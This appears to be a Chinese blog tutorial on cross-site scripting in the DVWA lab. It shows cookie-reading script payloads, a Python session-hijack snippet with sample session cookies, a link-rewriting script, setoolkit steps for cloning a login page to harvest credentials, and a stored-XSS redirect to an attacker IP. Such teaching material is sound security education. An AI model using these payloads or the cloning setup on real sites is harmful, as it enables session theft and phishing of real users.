XSS跨站脚本

XSS漏洞介绍

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆, 故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的
在这里插入图片描述

cookie介绍

cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。cookie是由web服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息

由于HTTP是一种无状态的协议,服务器单从网络连接上无从知道客户身份。怎么办呢?就给客户端们颁发一个通行证吧,每人一个,无论谁访问都必须携带自己通行证。这样服务器就能从通行证上确认客户身份了。这就是Cookie的工作原理。

XSS跨站脚本分类

反射型XSS

反射型XSS又称非持久性XSS,这种攻击往往具有一次性

攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接受该用户的请求并进行处理,然后把带有XSS的代码发送给用户。用户浏览器解析执行代码,触发XSS漏洞
如在输入框中输入<script>alert(document.cookie);</script>,该语句是js的语句,alert为弹出,document.cookie为显示cookie值
在这里插入图片描述
提交后我们可以看到弹出的cookie值
在这里插入图片描述

存储型XSS

存储型XSS又称持久型XSS,攻击脚本存储在目标服务器的数据库中,具有更强的隐蔽性

攻击者在论坛、博客、留言板中,发帖的过程中嵌入XSS攻击代码,帖子被目标服务器存储在数据库中。当用户进行正常访问时,触发XSS代码

在这里插入图片描述
提交后再次点击进入
在这里插入图片描述

DOM型XSS

DOM型XSS全称Document Object Model,使用DOM动态访问更新文档的内容、结构及样式

服务器响应不会处理攻击者脚本,而是用户浏览器处理这个响应时,DOM对象就会处理XSS代 码,触发XSS漏洞

在这里插入图片描述
我们对这个进行选择后,可以在网址处看到
在这里插入图片描述
同样的,也是将default=后的值更改为<script>alert(document.cookie);</script>

通过Python利用cookie会话劫持

cookie = "security=low; csrftoken=EIe9fIFCRE4BXu8bqHKRX60hfih1bZAnMFMA8w2DtTygLGXcemxxiAyeAqsJPXhi; PHPSESSID=g2ii9pn9u0sck0shjvcqtfgne0"

cookie = {i.split("=")[0]:i.split("=")[1] for i in cookie.split("; ")}

html = requests.get('http://127.0.0.1/DVWA/index.php',headers=headers).text
劫持会话后的操作
  • 1.获取页面数据
  • 2.劫持前端逻辑
  • 3.发送请求
  • 4.偷取用户资料
  • 5.偷取用户密码和登录状态

XSS窜改网页链接

<script>
window.onload = function(){
    var link = document.getElementsByTagName("a");
    for(j=0;j<link.length;j++){
        link[j].href = "http://www.baidu.com";
    }
}
</script>

XSS盗取用户信息原理

克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆网站的登录页面, 用户输入登录,账号和密码被存储
在这里插入图片描述

setoolkit工具克隆网站

在kali中输入 setoolkit

1.社会工程攻击>1
在这里插入图片描述
2.网站攻击>2
在这里插入图片描述
3.凭据收集攻击>3
在这里插入图片描述
4.root网站克隆>2
在这里插入图片描述
我们遍可以得到一个克隆到的网址,看起来与原网址是没有区别的
在这里插入图片描述
当对方在这输入用户密码时,该克隆网址不会有反应,但是在我们的虚拟机处已经得到了对方的信息
在这里插入图片描述

存储XSS跳转克隆网站

在DVWA中XSS(Stored)中执行

<script>
window.location = "http://ip地址/";
</script>
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值